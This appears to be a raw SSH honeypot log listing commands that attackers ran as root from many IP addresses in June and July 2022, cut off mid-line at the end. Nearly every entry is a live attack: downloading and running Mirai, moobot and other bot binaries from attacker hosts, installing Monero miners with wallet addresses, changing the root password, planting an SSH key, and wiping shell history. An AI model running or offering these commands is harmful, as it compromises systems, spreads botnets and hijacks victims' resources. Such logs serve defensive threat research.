/tmp/dred;perl /tmp/dred uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred perl /tmp/dred From 147.78.47.237 8-Jun-2022 09:03:42 ssh2 root Exec uname -a & cat /proc/version uname -a cat /proc/version From 46.19.137.50 8-Jun-2022 21:35:45 ssh2 root Exec wget 31.7.58.162/sh; chmod 777 sh; ./sh wns.x86 wget 31.7.58.162/sh chmod 777 sh ./sh wns.x86 From 66.70.180.54 10-Jun-2022 04:37:36 ssh2 root Exec cd /tmp ; wget 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/cnrig ; chmod 777 cnrig ; ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history cd /tmp wget 137.74.144.79/ok.sh sh ok.sh rm -rf ok.sh curl -O 137.74.144.79/ok.sh sh ok.sh rm -rf ok.sh curl -O 137.74.144.79/cnrig chmod 777 cnrig ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B history -c cat /dev/null > ~/.bash_history history -c rm -rf /root/.bash_history From 179.43.142.180 10-Jun-2022 17:41:31 ssh2 root Exec echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP From 136.144.41.231 10-Jun-2022 20:15:03 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ From 179.43.142.180 12-Jun-2022 08:49:16 ssh2 root Exec echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP From 136.144.41.231 12-Jun-2022 15:15:55 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ From 205.185.124.113 15-Jun-2022 13:48:47 ssh2 root Exec lscpu | grep cpu lscpu | grep cpu From 205.185.124.113 15-Jun-2022 13:57:05 ssh2 root Exec curl api.ip.sb/ip curl api.ip.sb/ip From 31.44.185.235 15-Jun-2022 18:50:35 ssh2 root Exec cat /bin/sh cat /bin/sh From 31.44.185.235 15-Jun-2022 23:05:40 ssh2 root Exec cat /bin/sh || cat /bin/busybox || cat /bin/bash cat /bin/sh || cat /bin/busybox || cat /bin/bash From 104.244.74.191 15-Jun-2022 23:22:39 ssh2 root Exec top -b -n 1 | grep top top -b -n 1 | grep top From 104.244.74.191 16-Jun-2022 00:58:26 ssh2 root Exec whoami whoami From 104.244.74.191 16-Jun-2022 01:30:52 ssh2 root Exec mkdir ~/.ssh&&echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxHCCWqIemQiJWdesLlmo/tBxGZhYvI5M9RG5+qVgWqalgeju0WLV8d4SyzQln2JCHlVACunSifby9XC7bAGSX4Gv0Tknew7Er8xWnLt44VMdHvXoUNsX64gVplpbNrfmNsoAyaFUF4NRhkuNjlIsUiq8g7loumanbBLV4Ov42FHqndB6bZKXbKWBquBWjViiAlgK1qvafG5WJ75jphBxGo7UbiiZzmcwjzw+Hc95VfPIR3jwQKrpsWUGG8LMK3u52YiHuNc4cFJ+S2KfJNTc0QLfdfrq63MHRkXM9Ltk0A1CnGEzEuDC+9ut7lhFMIQF+OAB3DlV1OhJVYgR6e9BdQ== rsa 2048-031322">>~/.ssh/authorized_key&&chmod 0644 ~/.ssh/authorized_key mkdir ~/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxHCCWqIemQiJWdesLlmo/tBxGZhYvI5M9RG5+qVgWqalgeju0WLV8d4SyzQln2JCHlVACunSifby9XC7bAGSX4Gv0Tknew7Er8xWnLt44VMdHvXoUNsX64gVplpbNrfmNsoAyaFUF4NRhkuNjlIsUiq8g7loumanbBLV4Ov42FHqndB6bZKXbKWBquBWjViiAlgK1qvafG5WJ75jphBxGo7UbiiZzmcwjzw+Hc95VfPIR3jwQKrpsWUGG8LMK3u52YiHuNc4cFJ+S2KfJNTc0QLfdfrq63MHRkXM9Ltk0A1CnGEzEuDC+9ut7lhFMIQF+OAB3DlV1OhJVYgR6e9BdQ== rsa 2048-031322">>~/.ssh/authorized_key chmod 0644 ~/.ssh/authorized_key From 104.244.74.191 16-Jun-2022 01:40:29 ssh2 root Exec mkdir /etc/xmrig&&cd /etc/xmrig&&wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz&&tar -zxvf xmrig-6.17.0-linux-x64.tar.gz&&cp ./xmrig-6.17.0/xmrig ./xmrig&&rm -rf xmrig-6*&&./xmrig -o 104.244.74.191 -B mkdir /etc/xmrig cd /etc/xmrig wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz tar -zxvf xmrig-6.17.0-linux-x64.tar.gz cp ./xmrig-6.17.0/xmrig ./xmrig rm -rf xmrig-6* ./xmrig -o 104.244.74.191 -B From 104.244.74.191 16-Jun-2022 01:42:44 ssh2 root Exec mkdir /etc/xmrig&&cd /etc/xmrig&&wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz&&tar -zxvf xmrig-6.17.0-linux-x64.tar.gz&&cp ./xmrig-6.17.0/xmrig ./xmrig&&rm -rf xmrig-6*&&chmod 777 xmrig&&./xmrig -o 104.244.74.191 -B mkdir /etc/xmrig cd /etc/xmrig wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz tar -zxvf xmrig-6.17.0-linux-x64.tar.gz cp ./xmrig-6.17.0/xmrig ./xmrig rm -rf xmrig-6* chmod 777 xmrig ./xmrig -o 104.244.74.191 -B From 104.244.74.191 16-Jun-2022 03:45:58 ssh2 root Exec pkill xmrig -f && curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s &&mkdir /etc/xmrig&&cd /etc/xmrig&&wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz&&tar -zxvf xmrig-6.17.0-linux-x64.tar.gz&&cp ./xmrig-6.17.0/xmrig ./xmrig&&rm -rf xmrig-6*&&./xmrig -o 104.244.74.191 -B pkill xmrig -f curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s mkdir /etc/xmrig cd /etc/xmrig wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz tar -zxvf xmrig-6.17.0-linux-x64.tar.gz cp ./xmrig-6.17.0/xmrig ./xmrig rm -rf xmrig-6* ./xmrig -o 104.244.74.191 -B From 45.95.169.118 16-Jun-2022 06:50:04 ssh2 root Exec wget http://45.95.169.118/mirai.x86;chmod 777 mirai.x86;./mirai.x86 Apache.x86 wget http://45.95.169.118/mirai.x86 chmod 777 mirai.x86 ./mirai.x86 Apache.x86 From 104.244.74.191 16-Jun-2022 16:49:16 ssh2 root Exec uname -a&&wget uname -a wget From 45.95.169.118 16-Jun-2022 22:29:33 ssh2 root Exec wget http://45.95.169.118/mirai.x86;chmod 777 mirai.x86;./mirai.x86 Apache.x86 wget http://45.95.169.118/mirai.x86 chmod 777 mirai.x86 ./mirai.x86 Apache.x86 From 62.197.136.157 17-Jun-2022 01:45:44 ssh2 root Exec wget http://62.197.136.157/x86_64; chmod 777 x86_64; ./x86_64 moobot.x86_64 wget http://62.197.136.157/x86_64 chmod 777 x86_64 ./x86_64 moobot.x86_64 From 104.244.74.191 17-Jun-2022 14:50:30 ssh2 root Exec uname -a&&cmake -h uname -a cmake -h From 96.42.233.96 17-Jun-2022 15:00:26 ssh2 root Exec uname -a || echo - uname -a || echo - From 104.244.74.191 18-Jun-2022 00:25:05 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O arm http://107.189.12.78/bin/arm; curl -o arm -O http://107.189.12.78/bin/arm; tftp 107.189.12.78 -c get arm; tftp -r arm -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm arm; chmod 777 arm;./arm; wget -O arm5 http://107.189.12.78/bin/arm5; curl -o arm5 -O http://107.189.12.78/bin/arm5; tftp 107.189.12.78 -c get arm5; tftp -r arm5 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm5 arm5; chmod 777 arm5;./arm5; wget -O arm6 http://107.189.12.78/bin/arm6; curl -o arm6 -O http://107.189.12.78/bin/arm6; tftp 107.189.12.78 -c get arm6; tftp -r arm6 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm6 arm6; chmod 777 arm6;./arm6; wget -O m68k http://107.189.12.78/bin/m68k; curl -o m68k -O http://107.189.12.78/bin/m68k; tftp 107.189.12.78 -c get m68k; tftp -r m68k -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 m68k m68k; chmod 777 m68k;./m68k; wget -O mips http://107.189.12.78/bin/mips; curl -o mips -O http://107.189.12.78/bin/mips; tftp 107.189.12.78 -c get mips; tftp -r mips -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mips mips; chmod 777 mips;./mips; wget -O mpsl http://107.189.12.78/bin/mpsl; curl -o mpsl -O http://107.189.12.78/bin/mpsl; tftp 107.189.12.78 -c get mpsl; tftp -r mpsl -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mpsl mpsl; chmod 777 mpsl;./mpsl; wget -O ppc http://107.189.12.78/bin/ppc; curl -o ppc -O http://107.189.12.78/bin/ppc; tftp 107.189.12.78 -c get ppc; tftp -r ppc -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 ppc ppc; chmod 777 ppc;./ppc; wget -O sh4 http://107.189.12.78/bin/sh4; curl -o sh4 -O http://107.189.12.78/bin/sh4; tftp 107.189.12.78 -c get sh4; tftp -r sh4 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 sh4 sh4; chmod 777 sh4;./sh4; wget -O x86 http://107.189.12.78/bin/x86; curl -o x86 -O http://107.189.12.78/bin/x86; tftp 107.189.12.78 -c get x86; tftp -r x86 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 x86 x86; chmod 777 x86;./x86; wget -O spc http://107.189.12.78/bin/spc; curl -o spc -O http://107.189.12.78/bin/spc; tftp 107.189.12.78 -c get spc; tftp -r spc -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 spc spc; chmod 777 spc;./spc;rm -rf arm arm5 arm6 m68k mips mpsl ppc sh4 spc x86; cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -O arm http://107.189.12.78/bin/arm curl -o arm -O http://107.189.12.78/bin/arm tftp 107.189.12.78 -c get arm tftp -r arm -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm arm chmod 777 arm ./arm wget -O arm5 http://107.189.12.78/bin/arm5 curl -o arm5 -O http://107.189.12.78/bin/arm5 tftp 107.189.12.78 -c get arm5 tftp -r arm5 -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm5 arm5 chmod 777 arm5 ./arm5 wget -O arm6 http://107.189.12.78/bin/arm6 curl -o arm6 -O http://107.189.12.78/bin/arm6 tftp 107.189.12.78 -c get arm6 tftp -r arm6 -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm6 arm6 chmod 777 arm6 ./arm6 wget -O m68k http://107.189.12.78/bin/m68k curl -o m68k -O http://107.189.12.78/bin/m68k tftp 107.189.12.78 -c get m68k tftp -r m68k -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 m68k m68k chmod 777 m68k ./m68k wget -O mips http://107.189.12.78/bin/mips curl -o mips -O http://107.189.12.78/bin/mips tftp 107.189.12.78 -c get mips tftp -r mips -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mips mips chmod 777 mips ./mips wget -O mpsl http://107.189.12.78/bin/mpsl curl -o mpsl -O http://107.189.12.78/bin/mpsl tftp 107.189.12.78 -c get mpsl tftp -r mpsl -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mpsl mpsl chmod 777 mpsl ./mpsl wget -O ppc http://107.189.12.78/bin/ppc curl -o ppc -O http://107.189.12.78/bin/ppc tftp 107.189.12.78 -c get ppc tftp -r ppc -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 ppc ppc chmod 777 ppc ./ppc From 104.244.74.191 18-Jun-2022 00:56:31 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O arm http://107.189.12.78/bins/arm; curl -o arm -O http://107.189.12.78/bins/arm; tftp 107.189.12.78 -c get arm; tftp -r arm -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm arm; chmod 777 arm;./arm; wget -O arm5 http://107.189.12.78/bins/arm5; curl -o arm5 -O http://107.189.12.78/bins/arm5; tftp 107.189.12.78 -c get arm5; tftp -r arm5 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm5 arm5; chmod 777 arm5;./arm5; wget -O arm6 http://107.189.12.78/bins/arm6; curl -o arm6 -O http://107.189.12.78/bins/arm6; tftp 107.189.12.78 -c get arm6; tftp -r arm6 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm6 arm6; chmod 777 arm6;./arm6; wget -O m68k http://107.189.12.78/bins/m68k; curl -o m68k -O http://107.189.12.78/bins/m68k; tftp 107.189.12.78 -c get m68k; tftp -r m68k -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 m68k m68k; chmod 777 m68k;./m68k; wget -O mips http://107.189.12.78/bins/mips; curl -o mips -O http://107.189.12.78/bins/mips; tftp 107.189.12.78 -c get mips; tftp -r mips -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mips mips; chmod 777 mips;./mips; wget -O mpsl http://107.189.12.78/bins/mpsl; curl -o mpsl -O http://107.189.12.78/bins/mpsl; tftp 107.189.12.78 -c get mpsl; tftp -r mpsl -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mpsl mpsl; chmod 777 mpsl;./mpsl; wget -O ppc http://107.189.12.78/bins/ppc; curl -o ppc -O http://107.189.12.78/bins/ppc; tftp 107.189.12.78 -c get ppc; tftp -r ppc -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 ppc ppc; chmod 777 ppc;./ppc; wget -O sh4 http://107.189.12.78/bins/sh4; curl -o sh4 -O http://107.189.12.78/bins/sh4; tftp 107.189.12.78 -c get sh4; tftp -r sh4 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 sh4 sh4; chmod 777 sh4;./sh4; wget -O x86 http://107.189.12.78/bins/x86; curl -o x86 -O http://107.189.12.78/bins/x86; tftp 107.189.12.78 -c get x86; tftp -r x86 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 x86 x86; chmod 777 x86;./x86; wget -O spc http://107.189.12.78/bins/spc; curl -o spc -O http://107.189.12.78/bins/spc; tftp 107.189.12.78 -c get spc; tftp -r spc -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 spc spc; chmod 777 spc;./spc;rm -rf arm arm5 arm6 m68k mips mpsl ppc sh4 spc x86; cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -O arm http://107.189.12.78/bins/arm curl -o arm -O http://107.189.12.78/bins/arm tftp 107.189.12.78 -c get arm tftp -r arm -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm arm chmod 777 arm ./arm wget -O arm5 http://107.189.12.78/bins/arm5 curl -o arm5 -O http://107.189.12.78/bins/arm5 tftp 107.189.12.78 -c get arm5 tftp -r arm5 -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm5 arm5 chmod 777 arm5 ./arm5 wget -O arm6 http://107.189.12.78/bins/arm6 curl -o arm6 -O http://107.189.12.78/bins/arm6 tftp 107.189.12.78 -c get arm6 tftp -r arm6 -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm6 arm6 chmod 777 arm6 ./arm6 wget -O m68k http://107.189.12.78/bins/m68k curl -o m68k -O http://107.189.12.78/bins/m68k tftp 107.189.12.78 -c get m68k tftp -r m68k -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 m68k m68k chmod 777 m68k ./m68k wget -O mips http://107.189.12.78/bins/mips curl -o mips -O http://107.189.12.78/bins/mips tftp 107.189.12.78 -c get mips tftp -r mips -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mips mips chmod 777 mips ./mips wget -O mpsl http://107.189.12.78/bins/mpsl curl -o mpsl -O http://107.189.12.78/bins/mpsl tftp 107.189.12.78 -c get mpsl tftp -r mpsl -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mpsl mpsl chmod 777 mpsl ./mpsl wget -O ppc http://107.189.12.78/bins/ppc curl -o ppc -O http://107.189.12.78/bins/ppc tftp 107.189.12.78 -c get ppc tftp -r ppc -g 107.189.12.78 ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 ppc ppc chmod 777 ppc ./ppc From 37.44.244.23 18-Jun-2022 13:50:13 ssh2 root Exec echo -n dpmmawwj|md5sum;uname -a echo -n dpmmawwj|md5sum uname -a From 113.229.114.221 20-Jun-2022 04:45:56 ssh2 root Exec echo "Uname: "`uname -a`;echo "ID: "`id` echo "Uname: "`uname -a` echo "ID: "`id` From 104.244.74.191 20-Jun-2022 07:17:49 ssh2 root Exec curl -L http://104.244.74.191/sep.sh -o sep.sh && chmod +x sep.sh && bash ./sep.sh curl -L http://104.244.74.191/sep.sh -o sep.sh chmod +x sep.sh bash ./sep.sh From 62.197.136.10 21-Jun-2022 20:33:23 ssh2 root Exec wget 62.197.136.157/x-8.6-.Sakura; chmod 777 x-8.6-.Sakura; ./x-8.6-.Sakura x86_64 wget 62.197.136.157/x-8.6-.Sakura chmod 777 x-8.6-.Sakura ./x-8.6-.Sakura x86_64 From 2.58.149.116 22-Jun-2022 12:02:22 ssh2 root Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f' echo -e '\x79\x65\x73\x68\x65\x6c\x6f' From 2.58.149.116 22-Jun-2022 12:34:51 ssh2 root Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f' echo -e '\x79\x65\x73\x68\x65\x6c\x6f' From 45.133.1.114 22-Jun-2022 14:04:25 ssh2 root Exec nproc;uname -s -n -r -i nproc uname -s -n -r -i From 212.192.241.132 23-Jun-2022 12:32:59 ssh2 root Exec sudo hive-passwd set dgj3235ij23jirg; sudo hive-passwd 2ji4ghji34hji3jh4i5i5j4h; pkill Xorg; sudo pkill x11vnc; uname -a sudo hive-passwd set dgj3235ij23jirg sudo hive-passwd 2ji4ghji34hji3jh4i5i5j4h pkill Xorg sudo pkill x11vnc uname -a From 200.125.29.162 25-Jun-2022 10:05:35 ssh2 root Exec echo -n 39thxk61|md5sum;uname -a echo -n 39thxk61|md5sum uname -a From 83.166.209.225 25-Jun-2022 18:08:17 ssh2 root Exec echo -n g4hi4idg|md5sum;uname -a echo -n g4hi4idg|md5sum uname -a From 36.110.228.254 26-Jun-2022 23:13:33 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" Exec /ip cloud print /ip cloud print From 194.60.201.85 30-Jun-2022 19:11:36 ssh2 root Exec cd /tmp ; wget http://95.111.214.132/ok.sh &> /dev/null ; sh ok.sh ; rm -rf ok.sh ; curl -O http://95.111.214.132/ok.sh &> /dev/null ; sh ok.sh ; rm -rf ok.sh ; history -c ; curl -O http://95.111.214.132/cnrig &> /dev/null ; chmod 777 cnrig ; ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B &> /dev/null ; history -c cd /tmp wget http://95.111.214.132/ok.sh > /dev/null sh ok.sh rm -rf ok.sh curl -O http://95.111.214.132/ok.sh > /dev/null sh ok.sh rm -rf ok.sh history -c curl -O http://95.111.214.132/cnrig > /dev/null chmod 777 cnrig ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B > /dev/null history -c From 62.197.136.10 1-Jul-2022 01:06:48 ssh2 root Exec wget 62.197.136.157/x-8.6-.Sakura; chmod 777 x-8.6-.Sakura; ./x-8.6-.Sakura x86_64 wget 62.197.136.157/x-8.6-.Sakura chmod 777 x-8.6-.Sakura ./x-8.6-.Sakura x86_64 From 179.43.142.180 1-Jul-2022 15:33:22 ssh2 root Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34ghij45h; sudo hive-passwd ij24ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a sudo hive-passwd set 2i4gij234ghji3534g4jiggg34ghij45h sudo hive-passwd ij24ij34gg34gg5ghgij45h sudo pkill Xorg sudo pkill x11vnc uname -a From 179.43.142.180 1-Jul-2022 15:42:28 ssh2 root Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34ghij45h; sudo hive-passwd ij24ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a sudo hive-passwd set 2i4gij234ghji3534g4jiggg34ghij45h sudo hive-passwd ij24ij34gg34gg5ghgij45h sudo pkill Xorg sudo pkill x11vnc uname -a From 65.21.236.179 3-Jul-2022 12:16:59 ssh2 root Exec cd /tmp ; wget http://51.210.71.115/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O http://51.210.71.115/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c cd /tmp wget http://51.210.71.115/ok.sh sh ok.sh rm -rf ok.sh curl -O http://51.210.71.115/ok.sh sh ok.sh rm -rf ok.sh history -c From 179.43.142.180 3-Jul-2022 13:27:48 ssh2 root Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34ghij45h; sudo hive-passwd ij234g4ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34ghij45h sudo hive-passwd ij234g4ij34gg34gg5ghgij45h sudo pkill Xorg sudo pkill x11vnc uname -a From 179.43.142.180 3-Jul-2022 13:41:51 ssh2 root Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34ghij45h; sudo hive-passwd ij234g4ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34ghij45h sudo hive-passwd ij234g4ij34gg34gg5ghgij45h sudo pkill Xorg sudo pkill x11vnc uname -a From 179.43.154.185 4-Jul-2022 23:25:43 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP From 179.43.142.180 5-Jul-2022 05:45:38 ssh2 root Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34gh23gij45h; sudo hive-passwd ij234g23g4ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34gh23gij45h sudo hive-passwd ij234g23g4ij34gg34gg5ghgij45h sudo pkill Xorg sudo pkill x11vnc uname -a From 179.43.142.180 5-Jul-2022 16:54:14 ssh2 root Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34gh23gij45h; sudo hive-passwd ij234g23g4ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34gh23gij45h sudo hive-passwd ij234g23g4ij34gg34gg5ghgij45h sudo pkill Xorg sudo pkill x11vnc uname -a From 179.43.154.185 5-Jul-2022 21:41:14 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP From 179.43.142.180 5-Jul-2022 23:16:31 ssh2 root Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34gh233g4gij45h; sudo hive-passwd ij2g4334g23g4ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34gh233g4gij45h sudo hive-passwd ij2g4334g23g4ij34gg34gg5ghgij45h sudo pkill Xorg sudo pkill x11vnc uname -a From 221.1.223.60 6-Jul-2022 01:11:15 ssh2 root Exec cat /proc/cpuinfo|grep name|cut -f2 